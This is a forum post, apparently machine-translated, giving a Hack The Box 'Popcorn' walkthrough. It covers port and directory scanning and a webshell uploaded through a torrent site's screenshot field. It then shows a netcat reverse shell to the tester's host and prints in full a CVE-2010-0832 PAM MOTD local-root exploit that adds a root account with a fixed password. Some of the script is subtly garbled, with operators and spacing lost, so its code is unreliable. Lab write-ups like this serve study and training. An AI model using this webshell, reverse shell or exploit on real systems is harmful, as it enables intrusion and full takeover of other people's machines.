Jump to content

Featured Replies

Posted

Hack The Box —— Popcorn

20190904190902.png-water_print

信息搜集

nmap

1

nmap -T4 -A -v 10.10.10.6

I found that the server opened the 22-port and 80-port browser to access the http service, and found that there was only the default page of apache.

目录扫描

Use the dirsearch tool to scan a wave of directories:

1

python3 dirsearch -u http://10.10.10.6 -e html

Discover the test.php page and torrent directory, perform directory scanning for the torrent directory, and discover that the upload upload directory can be accessed, and the index.php page exists at the same time.

功能点搜索

This website is a bt seed forum site, registered users, and discovered upload page.

20190904191408.png-water_print

20190904191435.png-water_print

漏洞利用

At the upload point, I tried to upload a webshell and found that it failed. I guessed that the program detected whether the uploaded file was a standard bt seed file and did not bypass the filtering.

Continue to upload the normal bt seed file and conduct further testing :

20190904191857.png-water_print

I found that the uploaded seed page exists on the screenshots icon upload point.

Try uploading the webshell and found that it was successfully uploaded.

20190904192051.png-water_print

20190904192134.png-water_print

Visit the upload directory and get the address of the webshell:

20190904192256.png-water_print

Kitchen knife connection:

20190904192316.png-water_print

Successfully obtained the user's flag.

20190904192325.png-water_print

At the same time, you will find the .cache folder in the home directory. After entering, you will find the motd.legal-displayed file.

20190904192449.png-water_print

Use search engines to search for related documents and find:

https://www.exploit-db.com/exploits/14339

Use a virtual terminal to bounce a shell to the local area to facilitate the power increase operation.

Native: nc -l 4444

Victim machine: nc -e /bin/bash 10.10.14.10 4444

Upload exp scripts using kitchen knife :

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

#!/bin/bash

#

# Exploit Title: Ubuntu PAM MOTD local root

# Date: July 9, 2010

# Author: Anonymous

# Software Link: http://packages.ubuntu.com/

# Version: pam-1.1.0

# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)

# CVE: CVE-2010-0832

# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i

# References: http://www.exploit-db.com/exploits/14273/by Kristian Erik Hermansen

P='toor:x:0:0:root:/root:/bin/bash'

S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:999999:7:'

echo '[*] Ubuntu PAM MOTD local root'

[ -z '$(which ssh)' ] echo '[-] ssh is a requirement' exit 1

[ -z '$(which ssh-keygen)' ] echo '[-] ssh-keygen is a requirement' exit 1

[ -z '$(ps -u root |grep sshd)' ] echo '[-] a running sshd is a requirement' exit 1

backup() {

[ -e '$1' ] [ -e '$1'.bak ] rm -rf '$1'.bak

[ -e '$1' ] || return 0

mv '$1'{,bak} || return 1

echo '[*] Backuped $1'

}

restore() {

[ -e '$1' ] rm -rf '$1'

[ -e '$1'.bak ] || return 0

mv '$1'{.bak,} || return 1

echo '[*] Restored $1'

}

key_create() {

backup ~/.ssh/authorized_keys

ssh-keygen -q -t rsa -N '' -C 'pam' -f '$KEY' || return 1

[ ! -d ~/.ssh ] { mkdir ~/.ssh || return 1; }

mv '$KEY.pub' ~/.ssh/authorized_keys || return 1

echo '[*] SSH key set up'

}

key_remove() {

rm -f '$KEY'

restore ~/.ssh/authorized_keys

echo '[*] SSH key removed'

}

own() {

[ -e ~/.cache ] rm -rf ~/.cache

ln -s '$1' ~/.cache || return 1

echo '[*] spawn ssh'

ssh -o 'NoHostAuthenticationForLocalhost yes' -i '$KEY' localhost true

[ -w '$1' ] || { echo '[-] Own $1 failed'; restore ~/.cache; bye; }

echo '[+] owned: $1'

}

bye() {

key_remove

exit 1

}

KEY='$(mktemp -u)'

key_create || { echo '[-] Failed to setup SSH key'; exit 1; }

backup ~/.cache || { echo '[-] Failed to backup ~/.cache'; bye; }

own /etc/passwd echo '$P' /etc/passwd

own /etc/shadow echo '$S' /etc/shadow

restore ~/.cache || { echo '[-] Failed to restore ~/.cache'; bye; }

key_remove

echo '[+] Success! Use password toor to get root'

su -c 'sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \

chgrp shadow /etc/shadow; nscd -i passwd /dev/null 21; bash' to or

And give the script execution permissions:

1

chmod + x 1.sh

Execute the script and obtain root permissions:

20190904194200.png-water_print

20190904194204.png-water_print

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

Important Information

HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.